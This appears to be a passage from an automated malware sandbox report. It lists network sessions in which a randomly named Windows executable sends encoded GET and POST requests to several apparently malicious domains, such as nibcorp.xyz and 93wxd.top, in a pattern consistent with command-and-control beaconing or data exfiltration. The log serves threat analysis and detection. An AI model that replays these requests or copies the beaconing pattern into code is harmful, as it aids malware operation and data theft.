                                                                                                                                                                                                                                    Data Raw: 32 35 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 54 c9 72 db 30 0c bd e7 2b 18 f6 90 8b 19 d9 69 ea c9 a8 92 7b e8 72 4c 3b 93 5e 7a a4 49 48 62 43 91 1a 92 de da e9 bf 97 4b 64 cb 96 ba e8 22 51 00 1e 1e 1e 40 14 d7 1f 3e bf ff fa ed cb 47 d4 b8 56 ae ae 8a f0 42 92 aa ba c4 a0 f0 ea 0a f9 a7 68 80 f2 f4 19 8f 2d 38 8a 58 43 8d 05 57 e2 8d ab c8 c3 8b e7 c9 ac 68 0b 25 de 0a d8 75 da 38 8c 98 56 0e 94 77 df 09 ee 9a 92 c3 56 30 20 f1 30 43 42 09 27 a8 24 96 51 09 e5 c2 83 c5 bc 11 cd 09 27 61 f5 a8 1d fa a4 37 8a 17 59 fa 31 f0 b8 26 c4 db 94 b3 88 90 01 4b 29 d4 33 32 20 4b cc 95 25 9d 81 0a 1c 6b 30 6a fc 57 89 b3 ac 0a 21 b7 b5 75 d4 09 76 cb 74 3b ac 21 06 27 cf c6 b9 ce e6 47 7f ad 6b 09 b4 13 36 84 64 cc da 77 15 6d 85 3c 94 8f 1b 5f 85 c6 29 a5 75 07 09 b6 01 70 67 c5 04 aa 4f d1 74 ce 35 ba 9f b8 87 c2 43 23 66 68 ad f9 01 fd 3c aa d1 ab b2 a6 ec b9 36 41 0f c2 b4 d4 26 47 af aa aa 7a 3b f2 eb 8d cb d7 cb f5 72 c2 1e 34 20 89 7f 8e 6e 52 05 37 33 64 a9 57 cc 82 11 7f 0a d9 81 a8 1b 97 a3 c5 [TRUNCATED]
                                                                                                                                                                                                                                    Data Ascii: 258Tr0+i{rL;^zIHbCKd"Q@>GVBh-8XCWh%u8VwV0 0CB'$Q'a7Y1&K)32 K%k0jW!uvt;!'Gk6dwm<_)upgOt5C#fh<6A&Gz;r4 nR73dW|>NflnESGCFJ&K=a~LQ)jE(y)sa;I9<}cqq.iuq0O~Bpi0km8bR=Z>!N? Gwnr.To<Nz-XK)J)JN"";"\b8f&s2\'#22Xw(/`+2\Y_/IS$$*/s0


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    8192.168.2.54999374.48.31.123803224C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:04.522831917 CEST556OUTGET /fxh3/?BHNhDJjp=TcdD1jH1CapNlBILQUUL6VPJeSSLh+pbMYQjXnoycmFxozx0bMDFjxvRFdG/tU/CFYGPAPKB1FL/Z2VQy4rjs+2Q8knST/5l8EVmCJfQbrXwTzWaySbdQJ1HTeqiGlwgAw==&KteDo=fX0Hm8kxa HTTP/1.1
                                                                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                    Host: www.facaicloud.top
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:05.166424036 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                    Cache-Control: no-cache, private
                                                                                                                                                                                                                                    date: Fri, 11 Oct 2024 13:10:05 GMT
                                                                                                                                                                                                                                    Data Raw: 36 31 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 73 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4e 75 [TRUNCATED]
                                                                                                                                                                                                                                    Data Ascii: 610<!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Not Found</title> ... Fonts --> <link rel="dns-prefetch" href="//fonts.gstatic.com"> <link href="https://fonts.googleapis.com/css?family=Nunito" rel="stylesheet"> ... Styles --> <style> html, body { background-color: #fff; color: #636b6f; font-family: 'Nunito', sans-serif; font-weight: 100; height: 100vh; margin: 0; } .full-height { height: 100vh; } .flex-center { align-items: center; display: flex; justify-content: center; } .position-ref { position: relative; } .code { border-right: 2 [TRUNCATED]
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:05.167201996 CEST550INData Raw: 20 73 6f 6c 69 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 36 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 35 70 78 20 30 20 31 35 70 78 3b 0a 20
                                                                                                                                                                                                                                    Data Ascii: solid; font-size: 26px; padding: 0 15px 0 15px; text-align: center; } .message { font-size: 18px; text-align: center; }


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    9192.168.2.5499943.33.130.190803224C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:10.219881058 CEST807OUTPOST /qy56/ HTTP/1.1
                                                                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                    Host: www.nibcorp.xyz
                                                                                                                                                                                                                                    Origin: http://www.nibcorp.xyz
                                                                                                                                                                                                                                    Referer: http://www.nibcorp.xyz/qy56/
                                                                                                                                                                                                                                    Content-Length: 209
                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
                                                                                                                                                                                                                                    Data Raw: 42 48 4e 68 44 4a 6a 70 3d 6a 77 74 57 6a 51 6c 32 74 7a 31 4d 68 4c 49 70 6e 4a 71 4e 6c 73 67 37 6d 67 2f 7a 4c 43 54 69 72 57 37 67 6b 78 79 79 68 69 6b 77 30 32 31 65 70 72 47 65 2f 41 74 78 38 6e 38 4f 4a 72 34 72 4c 38 37 78 6a 34 41 68 77 37 62 57 42 56 76 74 4c 47 66 76 2b 72 6f 6a 67 61 72 46 63 61 34 49 64 37 32 59 56 5a 77 64 75 58 45 50 4a 65 6e 5a 6b 71 43 51 71 47 78 46 76 2f 39 41 79 43 52 53 50 73 4c 46 62 49 72 32 42 4d 35 46 69 2b 2f 63 71 4b 74 76 4e 51 73 64 70 69 70 6a 79 46 42 64 5a 53 78 63 65 56 4c 68 4b 56 53 37 30 5a 6e 46 4a 54 74 35 55 4a 36 73 6e 69 71 50 6c 45 32 51 66 7a 51 61 6c 33 55 3d
                                                                                                                                                                                                                                    Data Ascii: BHNhDJjp=jwtWjQl2tz1MhLIpnJqNlsg7mg/zLCTirW7gkxyyhikw021eprGe/Atx8n8OJr4rL87xj4Ahw7bWBVvtLGfv+rojgarFca4Id72YVZwduXEPJenZkqCQqGxFv/9AyCRSPsLFbIr2BM5Fi+/cqKtvNQsdpipjyFBdZSxceVLhKVS70ZnFJTt5UJ6sniqPlE2QfzQal3U=


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    10192.168.2.5499953.33.130.190803224C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:12.760232925 CEST827OUTPOST /qy56/ HTTP/1.1
                                                                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                    Host: www.nibcorp.xyz
                                                                                                                                                                                                                                    Origin: http://www.nibcorp.xyz
                                                                                                                                                                                                                                    Referer: http://www.nibcorp.xyz/qy56/
                                                                                                                                                                                                                                    Content-Length: 229
                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
                                                                                                                                                                                                                                    Data Raw: 42 48 4e 68 44 4a 6a 70 3d 6a 77 74 57 6a 51 6c 32 74 7a 31 4d 6a 76 30 70 67 75 32 4e 67 4d 67 6b 70 41 2f 7a 46 69 54 6d 72 57 33 67 6b 30 53 69 6d 55 38 77 30 58 70 65 37 71 47 65 34 41 74 78 30 48 38 58 48 4c 34 6b 4c 38 32 4d 6a 39 34 68 77 37 66 57 42 51 54 74 49 31 33 73 73 72 6f 68 6f 36 72 44 44 4b 34 49 64 37 32 59 56 64 59 37 75 58 63 50 4a 76 58 5a 6c 4c 43 66 30 32 78 45 6d 66 39 41 67 79 52 57 50 73 4c 33 62 4b 50 51 42 50 4e 46 69 2f 50 63 70 62 74 73 48 51 74 33 32 79 6f 32 37 57 30 53 41 42 52 41 52 7a 36 61 62 7a 69 43 38 50 4b 76 54 78 6c 52 48 70 57 55 33 78 69 34 30 30 58 35 46 51 41 71 37 67 43 4c 6a 4d 77 70 32 37 35 6a 62 6a 46 37 4d 4f 66 44 51 68 33 73
                                                                                                                                                                                                                                    Data Ascii: BHNhDJjp=jwtWjQl2tz1Mjv0pgu2NgMgkpA/zFiTmrW3gk0SimU8w0Xpe7qGe4Atx0H8XHL4kL82Mj94hw7fWBQTtI13ssroho6rDDK4Id72YVdY7uXcPJvXZlLCf02xEmf9AgyRWPsL3bKPQBPNFi/PcpbtsHQt32yo27W0SABRARz6abziC8PKvTxlRHpWU3xi400X5FQAq7gCLjMwp275jbjF7MOfDQh3s


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    11192.168.2.5499963.33.130.190803224C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:15.309875965 CEST1844OUTPOST /qy56/ HTTP/1.1
                                                                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                    Host: www.nibcorp.xyz
                                                                                                                                                                                                                                    Origin: http://www.nibcorp.xyz
                                                                                                                                                                                                                                    Referer: http://www.nibcorp.xyz/qy56/
                                                                                                                                                                                                                                    Content-Length: 1245
                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
                                                                                                                                                                                                                                    Data Raw: 42 48 4e 68 44 4a 6a 70 3d 6a 77 74 57 6a 51 6c 32 74 7a 31 4d 6a 76 30 70 67 75 32 4e 67 4d 67 6b 70 41 2f 7a 46 69 54 6d 72 57 33 67 6b 30 53 69 6d 55 45 77 31 6c 68 65 34 4a 75 65 35 41 74 78 2b 6e 38 4b 48 4c 34 39 4c 38 75 41 6a 39 38 78 77 35 58 57 44 79 4c 74 63 55 33 73 32 37 6f 68 6b 61 72 43 63 61 34 64 64 37 6d 63 56 5a 30 37 75 58 63 50 4a 74 50 5a 6a 61 43 66 32 32 78 46 76 2f 39 63 79 43 52 75 50 73 54 6e 62 4b 62 41 41 38 56 46 69 66 66 63 73 70 46 73 61 41 73 52 33 79 70 31 37 57 70 53 41 42 4e 4d 52 33 79 67 62 30 4f 43 74 2b 50 72 4f 77 35 30 46 5a 53 50 6c 54 4b 31 31 6a 58 56 4c 7a 6b 72 2b 58 57 35 72 66 4d 72 68 4d 4a 35 50 7a 34 71 64 37 66 77 41 55 65 46 35 37 77 30 43 72 2b 53 33 7a 71 61 59 2b 34 4f 6e 69 46 55 2b 64 39 5a 51 54 72 6c 55 61 5a 2b 76 74 42 62 79 77 70 64 48 68 4d 38 37 39 6d 7a 70 46 32 41 54 56 4f 64 39 66 2b 4f 61 48 49 4b 4f 2b 64 6a 65 54 52 43 7a 77 7a 6c 7a 33 6b 76 78 33 4f 42 6b 4c 54 36 46 78 71 6a 56 58 72 4e 6b 49 74 55 5a 33 31 67 71 4e 37 4b 76 [TRUNCATED]
                                                                                                                                                                                                                                    Data Ascii: BHNhDJjp=jwtWjQl2tz1Mjv0pgu2NgMgkpA/zFiTmrW3gk0SimUEw1lhe4Jue5Atx+n8KHL49L8uAj98xw5XWDyLtcU3s27ohkarCca4dd7mcVZ07uXcPJtPZjaCf22xFv/9cyCRuPsTnbKbAA8VFiffcspFsaAsR3yp17WpSABNMR3ygb0OCt+PrOw50FZSPlTK11jXVLzkr+XW5rfMrhMJ5Pz4qd7fwAUeF57w0Cr+S3zqaY+4OniFU+d9ZQTrlUaZ+vtBbywpdHhM879mzpF2ATVOd9f+OaHIKO+djeTRCzwzlz3kvx3OBkLT6FxqjVXrNkItUZ31gqN7KvslL7wYp0rPuV0FMXfuesORbppR6kAqwbVHSHqLlRS+DZMPjM4YgaJiNSeRKaeuwgMs4zkk1UjzodlqeiccyH1dMXR/hn1S4+vhJWJcidyjMd6VS9OZEDsIeLnW887Mtm87M6T1zjrTZ7ML3XR7rA1NXON2cNxVIT0LlJYzsrvPd9MEq6mTunryPniuohaCWxcT5YCXpde6YZZRdZcDe7IbhNTfqctPBOsQ5eGOSGHZAGJ6B6kI35xEPPeKUXXJwMmIGtNIkVjyC9AU3LAjNjhlONvIjNQH2MwqzvKLrFnxGhffDvt9BjmBUoMB865cs8bVriM+MYpjDgtP9H9iQW+OH1PdholDiduqVpqPuaK0oMH0XKwwWhi/7hvlfcIjmgFrLu/kZGcvlGL4BhJ017BmV2vm9wx+cvha9Rf9eiUWPLKMs6hfYHJafUSJWv8uTE4BIUK4N980olxIXFTQ5HjwhvBkQkRsHT9Xj5vCNVocMgL3oWYvXtnzjl3LYYlmWN5fobElwogms9yiwZSjqebxzR07HuUCBQi29Xi91arHEpx4YeJ6REhCSgjzEl1Vy2shYbQsjH4HRM4U3YJrDXA8NqOWxsQgGF/18FOwMOywxQ95CKdMXOzDEgl1oY7cg93gCxU4eO7ELWFdc7VsM5MbkbRiRhjmiYzx [TRUNCATED]


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    12192.168.2.5499973.33.130.190803224C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:17.852786064 CEST553OUTGET /qy56/?BHNhDJjp=uyF2ggZKoDdItulgtu2puoUsvXv1Ogv9q0328ASdq3oqq3YtlZ+hpRVw5nQuFecPffSCq9gTwMP2Kh/GIFjlwtIVkvTjWbsmVqyCPN0loUcEBtHyjsPsgz9KuMJn6hseTA==&KteDo=fX0Hm8kxa HTTP/1.1
                                                                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                    Host: www.nibcorp.xyz
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:18.377603054 CEST412INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: openresty
                                                                                                                                                                                                                                    Date: Fri, 11 Oct 2024 13:10:18 GMT
                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                    Content-Length: 272
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 42 48 4e 68 44 4a 6a 70 3d 75 79 46 32 67 67 5a 4b 6f 44 64 49 74 75 6c 67 74 75 32 70 75 6f 55 73 76 58 76 31 4f 67 76 39 71 30 33 32 38 41 53 64 71 33 6f 71 71 33 59 74 6c 5a 2b 68 70 52 56 77 35 6e 51 75 46 65 63 50 66 66 53 43 71 39 67 54 77 4d 50 32 4b 68 2f 47 49 46 6a 6c 77 74 49 56 6b 76 54 6a 57 62 73 6d 56 71 79 43 50 4e 30 6c 6f 55 63 45 42 74 48 79 6a 73 50 73 67 7a 39 4b 75 4d 4a 6e 36 68 73 65 54 41 3d 3d 26 4b 74 65 44 6f 3d 66 58 30 48 6d 38 6b 78 61 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?BHNhDJjp=uyF2ggZKoDdItulgtu2puoUsvXv1Ogv9q0328ASdq3oqq3YtlZ+hpRVw5nQuFecPffSCq9gTwMP2Kh/GIFjlwtIVkvTjWbsmVqyCPN0loUcEBtHyjsPsgz9KuMJn6hseTA==&KteDo=fX0Hm8kxa"}</script></head></html>


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    13192.168.2.549998206.119.82.147803224C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:23.798057079 CEST801OUTPOST /u0td/ HTTP/1.1
                                                                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                    Host: www.93wxd.top
                                                                                                                                                                                                                                    Origin: http://www.93wxd.top
                                                                                                                                                                                                                                    Referer: http://www.93wxd.top/u0td/
                                                                                                                                                                                                                                    Content-Length: 209
                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
                                                                                                                                                                                                                                    Data Raw: 42 48 4e 68 44 4a 6a 70 3d 4a 72 4c 79 57 35 51 6d 31 62 6c 59 2b 64 63 64 76 58 52 63 50 30 78 59 6d 4c 65 4e 39 30 55 50 49 44 71 45 76 6f 44 46 6b 33 35 6e 51 58 4c 69 47 65 4e 76 77 4e 47 73 2f 54 4a 52 2b 58 39 72 42 30 31 4b 6e 41 31 74 43 35 6b 62 46 63 67 56 45 73 4e 34 63 4d 72 51 63 2b 34 50 77 44 59 53 53 67 63 32 32 6b 63 38 52 6f 4b 59 6a 42 34 45 42 2f 4b 58 39 4e 48 67 37 32 77 48 6c 71 4e 55 78 65 42 50 33 46 6a 6d 72 75 47 64 77 46 75 4b 56 4b 48 41 32 73 37 58 6a 69 79 49 67 2f 6e 66 61 64 4a 6a 65 35 56 73 6f 7a 35 48 61 77 33 78 52 6f 76 30 2b 6c 51 66 2f 47 52 61 58 34 2f 52 50 72 65 72 4d 63 55 3d
                                                                                                                                                                                                                                    Data Ascii: BHNhDJjp=JrLyW5Qm1blY+dcdvXRcP0xYmLeN90UPIDqEvoDFk35nQXLiGeNvwNGs/TJR+X9rB01KnA1tC5kbFcgVEsN4cMrQc+4PwDYSSgc22kc8RoKYjB4EB/KX9NHg72wHlqNUxeBP3FjmruGdwFuKVKHA2s7XjiyIg/nfadJje5Vsoz5Haw3xRov0+lQf/GRaX4/RPrerMcU=
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:24.685511112 CEST691INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Fri, 11 Oct 2024 13:10:24 GMT
                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                    Content-Length: 548
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    14192.168.2.549999206.119.82.147803224C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:26.337240934 CEST821OUTPOST /u0td/ HTTP/1.1
                                                                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                    Host: www.93wxd.top
                                                                                                                                                                                                                                    Origin: http://www.93wxd.top
                                                                                                                                                                                                                                    Referer: http://www.93wxd.top/u0td/
                                                                                                                                                                                                                                    Content-Length: 229
                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
                                                                                                                                                                                                                                    Data Raw: 42 48 4e 68 44 4a 6a 70 3d 4a 72 4c 79 57 35 51 6d 31 62 6c 59 34 39 73 64 74 32 52 63 4f 55 78 62 70 72 65 4e 30 55 55 4c 49 44 6d 45 76 74 69 65 6c 43 70 6e 51 7a 50 69 48 62 35 76 6c 4e 47 73 31 7a 4a 55 77 33 38 47 42 30 70 7a 6e 42 4a 74 43 35 67 62 46 64 51 56 46 62 5a 6e 63 63 72 53 46 4f 34 4e 2b 6a 59 53 53 67 63 32 32 6b 49 61 52 6f 69 59 6b 78 49 45 41 61 6d 55 69 39 48 6a 38 32 77 48 75 4b 4e 51 78 65 41 67 33 45 75 4e 72 6f 43 64 77 45 65 4b 55 59 2f 44 39 73 37 52 38 53 7a 69 6c 66 61 4c 51 4e 68 69 61 37 4d 50 35 67 77 35 57 6d 61 62 4c 4b 6e 63 74 46 38 6e 76 56 5a 74 47 49 65 34 56 49 4f 62 53 4c 41 6e 79 65 64 55 70 6d 46 2b 67 69 72 4d 79 36 59 72 68 61 4f 53
                                                                                                                                                                                                                                    Data Ascii: BHNhDJjp=JrLyW5Qm1blY49sdt2RcOUxbpreN0UULIDmEvtielCpnQzPiHb5vlNGs1zJUw38GB0pznBJtC5gbFdQVFbZnccrSFO4N+jYSSgc22kIaRoiYkxIEAamUi9Hj82wHuKNQxeAg3EuNroCdwEeKUY/D9s7R8SzilfaLQNhia7MP5gw5WmabLKnctF8nvVZtGIe4VIObSLAnyedUpmF+girMy6YrhaOS
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:27.258616924 CEST691INHTTP/1.1 404 Not Found
